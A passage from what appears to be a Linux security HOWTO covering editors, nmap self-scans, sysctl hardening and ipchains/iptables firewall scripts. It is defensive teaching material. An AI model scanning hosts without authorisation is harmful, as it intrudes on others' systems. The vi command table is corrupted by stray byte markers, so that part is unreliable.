    The Internet Firewall FAQ: [http://www.interhack.net/pubs/fwfaq/] http://
    www.interhack.net/pubs/fwfaq/

    The Site Security Handbook RFC: [http://www.ietf.org/rfc/rfc2196.txt]
    http://www.ietf.org/rfc/rfc2196.txt


<A0><A0>*<2A>Miscellaneous sites of interest:

    [http://www.bastille-linux.org] http://www.bastille-linux.org, for
    Mandrake and Red Hat only.

    SAINT: [http://www.wwdsi.com/saint/] http://www.wwdsi.com/saint/, system
    security analysis.

    SSL: [http://www.openssl.org/] http://www.openssl.org/

    SSH: [http://www.openssh.org/] http://www.openssh.org/

    Scan yourself: [http://www.hackerwhacker.com] http://
    www.hackerwhacker.com

    PAM: [http://www.kernel.org/pub/linux/libs/pam/index.html] http://
    www.kernel.org/pub/linux/libs/pam/index.html

    Detecting Trojaned Linux Kernel Modules: [http://members.prestige.net/
    tmiller12/papers/lkm.htm] http://members.prestige.net/tmiller12/papers/
    lkm.htm

    Rootkit checker: [http://www.chkrootkit.org] http://www.chkrootkit.org

    Port scanning tool nmap's home page: [http://www.insecure.org] http://
    www.insecure.org

    Nessus, more than just a port scanner: [http://www.nessus.org] http://
    www.nessus.org

    Tripwire, intrusion detection: [http://www.tripwire.org] http://
    www.tripwire.org

    Snort, sniffer and more: [http://www.snort.org] http://www.snort.org

    [http://www.mynetwatchman.com] http://www.mynetwatchman.com and [http://
    dshield.org] http://dshield.org are "Distributed Intrusion Detection
    Systems". They collect log data from subscribing "agents", and collate
    the data to find and report malicious activity. If you want to fight
    back, check these out.


-----------------------------------------------------------------------------
8.6. Editing Text Files

By Bill Staehle

All the world is a file.

There are a great many types of files, but I'm going to stretch it here, and
class them into two really broad families:


<A0>Text<A0>files<A0>are<A0>just<A0>that.
<A0>Binary<A0>files<A0>are<A0>not.

<A0><A0><A0><A0>

Binary files are meant to be read by machines, text files can be easily
edited, and are generally read by people. But text files can be (and
frequently are) read by machines. Examples of this would be configuration
files, and scripts.

There are a number of different text editors available in *nix. A few are
found on every system. That would be '/bin/ed' and '/bin/vi'. 'vi' is almost
always a clone such as 'vim' due to license problems. The problem with 'vi'
and 'ed' is that they are terribly user unfriendly. Another common editor
that is not always installed by default is 'emacs'. It has a lot more
features and capability, and is not easy to learn either.

As to 'user friendly' editors, 'mcedit' and 'pico' are good choices to start
with. These are often much easier for those new to *nix.

The first things to learn are how to exit an editing session, how to save
changes to the file, and then how to avoid breaking long lines that should
not be broken (wrapped).

The 'vi' editor

'vi' is one of the most common text editors in the Unix world, and it's
nearly always found on any *nix system. Actually, due to license problems,
the '/bin/vi' on a Linux system is always a 'clone', such as 'elvis', 'nvi',
or 'vim' (there are others). These clones can act exactly like the original
'vi', but usually have additional features that make it slightly less
impossible to use.

So, if it's so terrible, why learn about it? Two reasons. First, as noted,
it's almost guaranteed to be installed, and other (more user friendly)
editors may not be installed by default. Second, many of the 'commands' work
in other applications (such as the pager 'less' which is also used to view
man pages). In 'less', accidentally pressing the 'v' key starts 'vi' in most
installations.

'vi' has two modes. The first is 'command mode', and keystrokes are
interpreted as commands. The other mode is 'insert' mode, where nearly all
keystrokes are interpreted as text to be inserted.

==> Emergency exit from 'vi' 1. press the <esc> key up to three times, until
the computer beeps, or the screen flashes. 2. press the keys :q! <Enter>

That is: colon, the letter Q, and then the exclamation point, followed by the
Enter key.

'vi' commands are as follows. All of these are in 'command' mode:


a<A0><A0><A0><A0>Enter<A0>insertion<A0>mode<A0>after<A0>the<A0>cursor.
A<A0><A0><A0><A0>Enter<A0>insertion<A0>mode<A0>at<A0>the<A0>end<A0>of<A0>the<A0>current<A0>line.
i<A0><A0><A0><A0>Enter<A0>insertion<A0>mode<A0>before<A0>the<A0>cursor.
o<A0><A0><A0><A0>Enter<A0>insertion<A0>mode<A0>opening<A0>a<A0>new<A0>line<A0>BELOW<A0>current<A0>line.
O<A0><A0><A0><A0>Enter<A0>insertion<A0>mode<A0>opening<A0>a<A0>new<A0>line<A0>ABOVE<A0>current<A0>line.
h<A0><A0><A0><A0>move<A0>cursor<A0>left<A0>one<A0>character.
l<A0><A0><A0><A0>move<A0>cursor<A0>right<A0>one<A0>character.
j<A0><A0><A0><A0>move<A0>cursor<A0>down<A0>one<A0>line.
k<A0><A0><A0><A0>move<A0>cursor<A0>up<A0>one<A0>line.
/mumble<6C><65>move<76>cursor<6F>forward<72>to<74>next<78>occurrence<63>of<6F>'mumble'<27>in<69>
<A0><A0><A0><A0><A0><A0><A0><A0><A0>the<A0>text
?mumble<6C><65>move<76>cursor<6F>backward<72>to<74>next<78>occurrence<63>of<6F>'mumble'<27>
<A0><A0><A0><A0><A0><A0><A0><A0><A0>in<A0>the<A0>text
n<A0><A0><A0><A0>repeat<A0>last<A0>search<A0>(?<3F>or<6F>/<2F>without<75>'mumble'<27>to<74>search<63>for<6F>
<A0><A0><A0><A0><A0>will<A0>do<A0>the<A0>same<A0>thing)
u<A0><A0><A0><A0>undo<A0>last<A0>change<A0>made

^B<><42><A0>Scroll<6C>back<63>one<6E>window.
^F<><46><A0>Scroll<6C>forward<72>one<6E>window.
^U<><55><A0>Scroll<6C>up<75>one<6E>half<6C>window.
^D<><44><A0>Scroll<6C>down<77>one<6E>half<6C>window.

:w<><77><A0>Write<74>to<74>file.
:wq<77><71>Write<74>to<74>file,<2C>and<6E>quit.
:q<><71><A0>quit.
:q!<21><>Quit<69>without<75>saving.

<esc><3E><><A0>Leave<76>insertion<6F>mode.
<A0><A0>
<A0><A0><A0><A0>

NOTE: The four 'arrow' keys almost always work in 'command' or 'insert' mode.

The 'ed' editor.

The 'ed' editor is a line editor. Other than the fact that it is virtually
guaranteed to be on any *nix computer, it has no socially redeeming features,
although some applications may need it. A _lot_ of things have been offered
to replace this 'thing' from 1975.

==> Emergency exit from 'ed'

1. type a period on a line by itself, and press <Enter> This gets you to the
command mode or prints a line of text if you were in command mode. 2. type q
and press <Enter>. If there were no changes to the file, this action quits
ed. If you then see a '?' this means that the file had changed, and 'ed' is
asking if you want to save the changes. Press q and <Enter> a second time to
confirm that you want out.

The 'pico' editor.

'pico' is a part of the Pine mail/news package from the University of
Washington (state, USA). It is a very friendly editor, with one minor
failing. It silently inserts a line feed character and wraps the line when it
exceeds (generally) 74 characters. While this is fine while creating mail,
news articles, and text notes, it is often fatal when editing system files.
The solution to this problem is simple. Call the program with the -w option,
like this:

pico -w file_2_edit

Pico is so user friendly, no further instructions are needed. It _should_ be
obvious (look at the bottom of the screen for commands). There is an
extensive help function. Pico is available with nearly all distributions,
although it _may_ not be installed by default.

==> Emergency exit from 'pico'

Press and hold the <Ctrl> key, and press the letter x. If no changes had been
made to the file, this will quit pico. If changes had been made, it will ask
if you want to save the changes. Pressing n will then exit.

The 'mcedit' editor.

'mcedit' is part of the Midnight Commander shell program, a full featured
visual shell for Unix-like systems. It can be accessed directly from the
command line ( mcedit file_2_edit ) or as part of 'mc' (use the arrow keys to
highlight the file to be edited, then press the F4 key).

mcedit is probably the most intuitive editor available, and comes with
extensive help. "commands" are accessed through the F* keys. Midnight
Commander is available with nearly all distributions, although it _may_ not
be installed by default.

==> Emergency exit from 'mcedit'

Press the F10 key. If no changes have been made to the file, this will quit
mcedit. If changes had been made, it will ask if you want to Cancel this
action. Pressing n will then exit.
-----------------------------------------------------------------------------

8.7. nmap

Let's look at a few quick examples of what nmap scans look like. The intent
here is to show how to use nmap to verify our firewalling, and system
integrity. nmap has other uses that we don't need to get into. Do NOT use
nmap on systems other than your own, unless you have permission from the
owner, and you know it is not a violation of anyone's Terms of Service. This
kind of thing will be taken as hostile by most people.

As mentioned previously, nmap is a sophisticated port scanning tool. It tries
to see if a host is "there", and what ports might be open. Barring that, what
states those ports might be in. nmap has a complex command line and can do
many types of "scans". See the man page for all the nitty gritty.

A couple of words of warning first. If using portsentry, turn it off. It will
drop the route to wherever the scan is coming from. You might want to turn
off any logging also, or at least be aware that you might get copious logs if
doing multiple scans.

A simple, default scan of "localhost":

+---------------------------------------------------------------------------+
| # nmap localhost                                                          |
|                                                                           |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )   |
| Interesting ports on bigcat (127.0.0.1):                                  |
| (The 1507 ports scanned but not shown below are in state: closed)         |
|                                                                           |
| Port       State       Service                                            |
| 22/tcp     open        ssh                                                |
| 25/tcp     open        smtp                                               |
| 37/tcp     open        time                                               |
| 53/tcp     open        domain                                             |
| 80/tcp     open        http                                               |
| 3000/tcp   open        ppp                                                |
|                                                                           |
| Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds       |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

If you've read most of this document, you should be familiar with these
services by now. These are some of the same ports we've seen in other
examples. Some things to note on this scan: it only did 1500+ "interesting"
ports -- not all ports. This can be configured differently if more is
desirable (see man page). It only did TCP ports too. Again, configurable. It
only picks up "listening" services, unlike netstat that shows all open ports
-- listening or otherwise. Note the last "open" port here is 3000 is
identified as "PPP". Wrong! That is just an educated guess by nmap based on
what is contained in /etc/services for this port number. Actually in this
case it is ntop (a network traffic monitor). Take the service names with a
grain of salt. There is no way for nmap to really know what is on that port.
Matching port numbers with service names can at times be risky. Many do have
standard ports, but there is nothing to say they have to use the commonly
associated port numbers.

Notice that in all our netstat examples, we had two classes of open ports:
listening servers, and then established connections that we initiated to
other remote hosts (e.g. a web server somewhere). nmap only sees the first
group -- the listening servers! The other ports connecting us to remote
servers are not visible, and thus not vulnerable. These ports are "private"
to that single connection, and will be closed when the connection is
terminated.

So we have open and closed ports here. Simple enough, and gives a pretty good
idea what is running on bigcat -- but not necessarily what we look like to
the outside world since this was done from localhost, and wouldn't reflect
any firewalling or other access control mechanisms.

Let's do a little more intensive scan. Let's check all ports -- TCP and UDP.

+---------------------------------------------------------------------------+
| # nmap -sT -sU -p 1-65535 localhost                                       |
|                                                                           |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )   |
| Interesting ports on bigcat (127.0.0.1):                                  |
| (The 131050 ports scanned but not shown below are in state: closed)       |
|                                                                           |
| Port       State       Service                                            |
| 22/tcp     open        ssh                                                |
| 25/tcp     open        smtp                                               |
| 37/tcp     open        time                                               |
| 53/tcp     open        domain                                             |
| 53/udp     open        domain                                             |
| 80/tcp     open        http                                               |
| 3000/tcp   open        ppp                                                |
| 8000/tcp   open        unknown                                            |
| 32768/udp  open        unknown                                            |
|                                                                           |
| Nmap run completed -- 1 IP address (1 host up) scanned in 385 seconds     |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

This is more than just "interesting" ports -- it is everything. We picked up
a couple of new ones in the process too. We've seen these before with netstat
, so we know what they are. That is the Junkbuster web proxy on port 8000/tcp
and named on 32768/udp. This scan takes much, much longer, but it is the only
way to see all ports.

So now we have a pretty good idea of what is open on bigcat. Since we are
scanning localhost from localhost, everything should be visible. We still
don't know how the outside world sees us though. Now I'll ssh to another host
on the same LAN, and try again.

+---------------------------------------------------------------------------+
| # nmap bigcat                                                             |
|                                                                           |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )   |
| Interesting ports on bigcat (192.168.1.1):                                |
| (The 1520 ports scanned but not shown below are in state: closed)         |
|                                                                           |
| Port       State       Service                                            |
| 22/tcp     open        ssh                                                |
| 3000/tcp   open        ppp                                                |
|                                                                           |
| Nmap run completed -- 1 IP address (1 host up) scanned in 1 second        |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

I confess to tampering with the iptables rules here to make a point. Only two
visible ports on this scan. Everything else is "closed". So says nmap. Once
again:

+----------------------------------------------------------------------------------+
| # nmap bigcat                                                                    |
|                                                                                  |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )          |
| Note: Host seems down. If it is really up, but blocking our ping probes, try -P0 |
|                                                                                  |
| Nmap run completed -- 1 IP address (0 hosts up) scanned in 30 seconds            |
|                                                                                  |
|                                                                                  |
+----------------------------------------------------------------------------------+

Oops, I blocked ICMP (ping) while I was at it this time. One more time:

+---------------------------------------------------------------------------+
| # nmap -P0 bigcat                                                         |
|                                                                           |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )   |
| All 1523 scanned ports on bigcat (192.168.1.1) are: filtered              |
|                                                                           |
| Nmap run completed -- 1 IP address (1 host up) scanned in 1643 seconds    |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

That's it. Notice how long that took. Notice ports are now "filtered" instead
of "closed". How does nmap know that? Well for one, "closed" means bigcat
sent a packet back saying "nothing running here", i.e. port is closed. In
this last example, the iptables rules were changed to not allow ICMP (ping),
and to "DROP" all incoming packets. In other words, no response at all. A
subtle difference since nmap seems to still know there was a host there, even
though no response was given. One lesson here, is if you want to slow a
scanner down, "DROP" (or "DENY") the packets. This forces a TCP time out for
the remote end on each port probe. Anyway, if your scans look like this, that
is probably as well as can be expected, and your firewall is doing its job.

A brief note on UDP: nmap can not accurately determine the status of these
ports if they are "filtered". You probably will get a false-positive "open"
condition. This has to do with UDP being a connectionless protocol. If nmap
gets no answer (e.g. due to a "DROP"), it assumes the packets reached the
target, and thus the port will be reported as "open". This is "normal" for
nmap.

We can play with firewall rules in a LAN set up to try to simulate how the
outside world sees us, and if we are smart, and know what we are doing, and
don't have a brain fart, we probably will have a pretty good picture. But it
is still best to try to find a way to do it from outside if possible. Again,
make sure you are not violating any ISP rules of conduct. Do you have a
friend on the same ISP?
-----------------------------------------------------------------------------

8.8. Sysctl Options

The "sysctl" options are kernel parameters that can be configured via the /
proc filesystem. These can be dynamically adjusted at run-time. Typically
these options are off if set to "0", and on if set to "1".

Some of these have security implications, and thus is why we are here ;-)
We'll just list the ones we think are relevant. Feel free to cut and paste
these into a firewall script, or other file that is run during boot (like /
etc/rc.local). Red Hat provides the sysctl command for dynamically adjusting
these values (see man page). Or they can permanently be set in /etc/
sysctl.conf with your text editor of choice. sysctl is executed during init,
and uses these values. You can read up on what these mean in /usr/src/linux/
Documentation/sysctl/README and other files in the kernel Documentation
directories.

The traditional method:

#!/bin/sh
#
# Configure kernel sysctl run-time options.
#
###################################################################

# Anti-spoofing blocks
for i in /proc/sys/net/ipv4/conf/*/rp_filter;
do
 echo 1 > $i
done

# Ensure source routing is OFF
for i in /proc/sys/net/ipv4/conf/*/accept_source_route;
 do
  echo 0 > $i
 done

# Ensure TCP SYN cookies protection is enabled
[ -e /proc/sys/net/ipv4/tcp_syncookies ] &&\
 echo 1 > /proc/sys/net/ipv4/tcp_syncookies

# Ensure ICMP redirects are disabled
for i in /proc/sys/net/ipv4/conf/*/accept_redirects;
 do
  echo 0 > $i
 done

# Ensure oddball addresses are logged
[ -e /proc/sys/net/ipv4/conf/all/log_martians ] &&\
 echo 1 > /proc/sys/net/ipv4/conf/all/log_martians

[ -e /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts ] &&\
 echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

[ -e /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses ] &&\
 echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

## Optional from here on down, depending on your situation. ############

# Ensure ip-forwarding is enabled if
# we want to do forwarding or masquerading.
[ -e /proc/sys/net/ipv4/ip_forward ] &&\
 echo 1 > /proc/sys/net/ipv4/ip_forward

# On if your IP is dynamic (or you don't know).
[ -e /proc/sys/net/ipv4/ip_dynaddr ] &&\
 echo 1 > /proc/sys/net/ipv4/ip_dynaddr

# eof


The same effect by using /etc/sysctl.conf instead:

#
# Add to existing sysctl.conf
#

# Anti-spoofing blocks
net.ipv4.conf.default.rp_filter = 1
net.ipv4.conf.all.rp_filter = 1

# Ensure source routing is OFF
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.all.accept_source_route = 0

# Ensure TCP SYN cookies protection is enabled
net.ipv4.tcp_syncookies = 1

# Ensure ICMP redirects are disabled
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.accept_redirects = 0

# Ensure oddball addresses are logged
net.ipv4.conf.default.log_martians = 1
net.ipv4.conf.all.log_martians = 1


net.ipv4.icmp_echo_ignore_broadcasts = 1

net.ipv4.icmp_ignore_bogus_error_responses = 1

## Optional from here on down, depending on your situation. ############

# Ensure ip-forwarding is enabled if
# we want to do forwarding or masquerading.
net.ipv4.ip_forward = 1

# On if your IP is dynamic (or you don't know).
net.ipv4.ip_dynaddr = 1

# end of example


-----------------------------------------------------------------------------

8.9. Secure Alternatives

This section will give a brief run down on secure alternatives to potentially
insecure methods. This will be a hodge podge of clients and servers.

<A0><A0>*<2A>telnet, rsh - ssh

<A0><A0>*<2A>ftp, rcp - scp or sftp. Both are part of ssh packages. Also, files can
    easily be transfered via HTTP if Apache is already running anyway. Apache
    can be buttoned down even more by using SSL (HTTPS).

<A0><A0>*<2A>sendmail - postfix, qmail. Not to imply that current versions of sendmail
    are insecure. Just that there is some bad history there, and just because
    it is so widely used that it makes an inviting crack target.

    As noted above, Linux installations often include a fully functional mail
    server. While this may have some advantages, it is not necessary in many
    cases for simply sending mail, or retrieving mail. This can all be done
    without a "mail server daemon" running locally.

<A0><A0>*<2A>POP3 - SPOP3, POP3 over SSL. If you really need to run your own POP
    server, this is the way to do it. If retrieving your mail from your ISP's
    server, then you are at their mercy as to what they provide.

<A0><A0>*<2A>IMAP - IMAPS, same as above.

<A0><A0>*<2A>If you find you need a particular service, and it is for just you or a
    few friends, consider running it on a non-standard port. Most server
    daemons support this, and is not a problem as long as those who will be
    connecting, know about it. For instance, the standard port for sshd is
    22. Any worm or scan will probe for this port number. So run it on a
    randomly chosen port. See the sshd man page.


-----------------------------------------------------------------------------
8.10. Ipchains and Iptables Redux

This section offers a little more advanced look at some of things that
ipchains and iptables can do. These are basically the same scripts as in Step
3 above, just with some more advanced configuration options added. These will
provide "masquerading", "port forwarding", allow access to some user
definable services, and a few other things. Read the comments for
explanations.
-----------------------------------------------------------------------------

8.10.1. ipchains II

#!/bin/sh
#
# ipchains.sh
#
# An example of a simple ipchains configuration. This script
# can enable 'masquerading' and will open user definable ports.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
# Set the location of ipchains (default).
IPCHAINS=/sbin/ipchains

# Local Interfaces
#
# This is the WAN interface, that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#
# Local Area Network (LAN) interface.
#LAN_IFACE="eth0"
LAN_IFACE="eth1"

# Our private LAN address(es), for masquerading.
LAN_NET="192.168.1.0/24"

# For static IP, set it here!
#WAN_IP="1.2.3.4"

# Set a list of public server port numbers here...not too many!
# These will be open to the world, so use caution. The example is
# sshd, and HTTP (www). Any services included here should be the
# latest version available from your vendor. Comment out to disable
# all PUBLIC services.
#PUBLIC_PORTS="22 80 443"
PUBLIC_PORTS="22"

# If we want to do port forwarding, this is the host
# that will be forwarded to.
#FORWARD_HOST="192.168.1.3"

# A list of ports that are to be forwarded.
#FORWARD_PORTS="25  80"

# If you get your public IP address via DHCP, set this.
DHCP_SERVER=66.21.184.66

# If you need identd for a mail server, set this.
MAIL_SERVER=

# A list of unwelcome hosts or nets. These will be denied access
# to everything, even our 'PUBLIC' services. Provide your own list.
#BLACKLIST="11.22.33.44 55.66.77.88"

# A list of "trusted" hosts and/or nets. These will have access to
# ALL protocols, and ALL open ports. Be selective here.
#TRUSTED="1.2.3.4/8  5.6.7.8"

## end user configuration options #################################
###################################################################

# The high ports used mostly for connections we initiate and return
# traffic.
LOCAL_PORTS=`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f1`:\
`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f2`

# Any and all addresses from anywhere.
ANYWHERE="0/0"

# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPCHAINS -F

# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that ipchains uses.
$IPCHAINS -P forward DENY
$IPCHAINS -P output ACCEPT
$IPCHAINS -P input DENY

# Accept localhost/loopback traffic.
$IPCHAINS -A input -i lo -j ACCEPT

# Get our dynamic IP now from the Inet interface. WAN_IP will be our
# IP address we are protecting from the outside world. Put this
# here, so default policy gets set, even if interface is not up
# yet.
[ -z "$WAN_IP" ] &&\
  WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \  -f 1`

# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1

WAN_MASK=`ifconfig $WAN_IFACE | grep Mask | cut -d : -f 4`
WAN_NET="$WAN_IP/$WAN_MASK"

## Reserved IPs:
#
# We should never see these private addresses coming in from outside
# to our external interface.
$IPCHAINS -A input -l -i $WAN_IFACE -s 10.0.0.0/8     -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 172.16.0.0/12  -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 192.168.0.0/16 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 127.0.0.0/8    -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 169.254.0.0/16 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 224.0.0.0/4    -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 240.0.0.0/5    -j DENY
# Bogus routing
$IPCHAINS -A input -l -s 255.255.255.255 -d $ANYWHERE -j DENY

## LAN access and masquerading
#
# Allow connections from our own LAN's private IP addresses via the LAN
# interface and set up forwarding for masqueraders if we have a LAN_NET
# defined above.
if [ -n "$LAN_NET" ]; then
 echo 1 > /proc/sys/net/ipv4/ip_forward
 $IPCHAINS -A input  -i $LAN_IFACE  -j ACCEPT
 $IPCHAINS -A forward -s $LAN_NET -d $LAN_NET -j ACCEPT
 $IPCHAINS -A forward  -s $LAN_NET -d ! $LAN_NET -j MASQ
fi

## Blacklist hosts/nets
#
# Get the blacklisted hosts/nets out of the way, before we start opening
# up any services. These will have no access to us at all, and will be
# logged.
for i in $BLACKLIST; do
 $IPCHAINS -A input -l -s $i -j DENY
done

## Trusted hosts/nets
#
# This is our trusted host list. These have access to everything.
for i in $TRUSTED; do
 $IPCHAINS -A input -s $i -j ACCEPT
done

# Port Forwarding
#
# Which ports get forwarded to which host. This is one to one
# port mapping (ie 80 -> 80) in this case.
# NOTE: ipmasqadm is a separate package from ipchains and needs
# to be installed also. Check first!
[ -n "$FORWARD_HOST" ] && ipmasqadm portfw -f &&\
 for i in $FORWARD_PORTS; do
   ipmasqadm portfw -a -P tcp -L $WAN_IP $i -R $FORWARD_HOST $i
 done

## Open, but Restricted Access ports/services
#
# Allow DHCP server (their port 67) to client (to our port 68) UDP traffic
# from outside source.
[ -n "$DHCP_SERVER" ] &&\
 $IPCHAINS -A input -p udp -s $DHCP_SERVER 67 -d $ANYWHERE 68 -j ACCEPT

# Allow 'identd' (to our TCP port 113) from mail server only.
[ -n "$MAIL_SERVER" ] &&\
 $IPCHAINS -A input -p tcp -s $MAIL_SERVER  -d $WAN_IP 113 -j ACCEPT

# Open up PUBLIC server ports here (available to the world):
for i in $PUBLIC_PORTS; do
 $IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $i -j ACCEPT
done

# So I can check my home POP3 mailbox from work. Also, so I can ssh
# in to home system. Only allow connections from my workplace's
# various IPs. Everything else is blocked.
$IPCHAINS -A input -p tcp -s 255.10.9.8/29 -d $WAN_IP 110 -j ACCEPT

# Uncomment to allow ftp data back (active ftp). Not required for 'passive'
# ftp connections.
#$IPCHAINS -A input -p tcp -s $ANYWHERE 20 -d $WAN_IP $LOCAL_PORTS -y -j ACCEPT

# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are
# the high, unprivileged ports (1024 to 4999 by default). This will
# allow return connection traffic for connections that we initiate
# to outside sources. TCP connections are opened with 'SYN' packets.
# We have already opened those services that need to accept SYNs
# for, so other SYNs are excluded here for everything else.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT

# We can't be so selective with UDP since that protocol does not know
# about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT

# Allow access to the masquerading ports conditionally. Masquerading
# uses it's own port range -- on 2.2 kernels ONLY! 2.4 kernels, do not
# use these ports, so comment out!
[ -n "$LAN_NET" ] &&\
 $IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP 61000: ! -y -j ACCEPT &&\
 $IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP 61000: -j ACCEPT

## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPCHAINS -A input  -p icmp  --icmp-type echo-reply \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input  -p icmp  --icmp-type destination-unreachable \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input  -p icmp  --icmp-type time-exceeded \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT

#######################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-l'.
# Outgoing traffic is allowed as the default policy for the 'output'
# chain. There are no restrictions on that.

$IPCHAINS -A input -l -j DENY

echo "Ipchains firewall is up `date`."

##-- eof ipchains.sh


-----------------------------------------------------------------------------

8.10.2. iptables II

#!/bin/sh
#
# iptables.sh
#
# An example of a simple iptables configuration. This script
# can enable 'masquerading' and will open user definable ports.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
# Set the location of iptables (default).
IPTABLES=/sbin/iptables

# Local Interfaces
# This is the WAN interface that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#
# Local Area Network (LAN) interface.
#LAN_IFACE="eth0"
LAN_IFACE="eth1"

# Our private LAN address(es), for masquerading.
LAN_NET="192.168.1.0/24"

# For static IP, set it here!
#WAN_IP="1.2.3.4"

# Set a list of public server port numbers here...not too many!
# These will be open to the world, so use caution. The example is
# sshd, and HTTP (www). Any services included here should be the
# latest version available from your vendor. Comment out to disable
# all Public services. Do not put any ports to be forwarded here,
# this only direct access.
#PUBLIC_PORTS="22 80 443"
PUBLIC_PORTS="22"

# If we want to do port forwarding, this is the host
# that will be forwarded to.
#FORWARD_HOST="192.168.1.3"

# A list of ports that are to be forwarded.
#FORWARD_PORTS="25  80"

# If you get your public IP address via DHCP, set this.
DHCP_SERVER=66.21.184.66

# If you need identd for a mail server, set this.
MAIL_SERVER=

# A list of unwelcome hosts or nets. These will be denied access
# to everything, even our 'Public' services. Provide your own list.
#BLACKLIST="11.22.33.44 55.66.77.88"

# A list of "trusted" hosts and/or nets. These will have access to
# ALL protocols, and ALL open ports. Be selective here.
#TRUSTED="1.2.3.4/8  5.6.7.8"

## end user configuration options #################################
###################################################################

# Any and all addresses from anywhere.
ANYWHERE="0/0"

# These modules may need to be loaded:
modprobe ip_conntrack_ftp
modprobe ip_nat_ftp

# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPTABLES -F
$IPTABLES -X


# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that IPTABLES uses.
$IPTABLES -P FORWARD DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P INPUT DROP

# Accept localhost/loopback traffic.
$IPTABLES -A INPUT -i lo -j ACCEPT

# Get our dynamic IP now from the Inet interface. WAN_IP will be the
# address we are protecting from outside addresses.
[ -z "$WAN_IP" ] &&\
  WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \  -f 1`

# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1

WAN_MASK=`ifconfig $WAN_IFACE |grep Mask |cut -d : -f 4`
WAN_NET="$WAN_IP/$WAN_MASK"

## Reserved IPs:
#
# We should never see these private addresses coming in from outside
# to our external interface.
$IPTABLES -A INPUT -i $WAN_IFACE -s 10.0.0.0/8      -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 172.16.0.0/12   -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 192.168.0.0/16  -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 127.0.0.0/8     -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 169.254.0.0/16  -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 224.0.0.0/4     -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 240.0.0.0/5     -j DROP
# Bogus routing
$IPTABLES -A INPUT -s 255.255.255.255 -d $ANYWHERE -j DROP

# Unclean
$IPTABLES -A INPUT -i $WAN_IFACE -m unclean -m limit \
        --limit 15/minute -j LOG --log-prefix "Unclean: "
$IPTABLES -A INPUT -i $WAN_IFACE -m unclean -j DROP

## LAN access and masquerading
#
# Allow connections from our own LAN's private IP addresses via the LAN
# interface and set up forwarding for masqueraders if we have a LAN_NET
# defined above.
if [ -n "$LAN_NET" ]; then
 echo 1 > /proc/sys/net/ipv4/ip_forward
 $IPTABLES -A INPUT -i $LAN_IFACE  -j ACCEPT
# $IPTABLES -A INPUT -i $LAN_IFACE -s $LAN_NET -d $LAN_NET  -j ACCEPT
 $IPTABLES -t nat -A POSTROUTING -s $LAN_NET -o $WAN_IFACE -j MASQUERADE
fi

## Blacklist
#
# Get the blacklisted hosts/nets out of the way, before we start opening
# up any services. These will have no access to us at all, and will
# be logged.
for i in $BLACKLIST; do
 $IPTABLES -A INPUT -s $i -m limit --limit 5/minute \
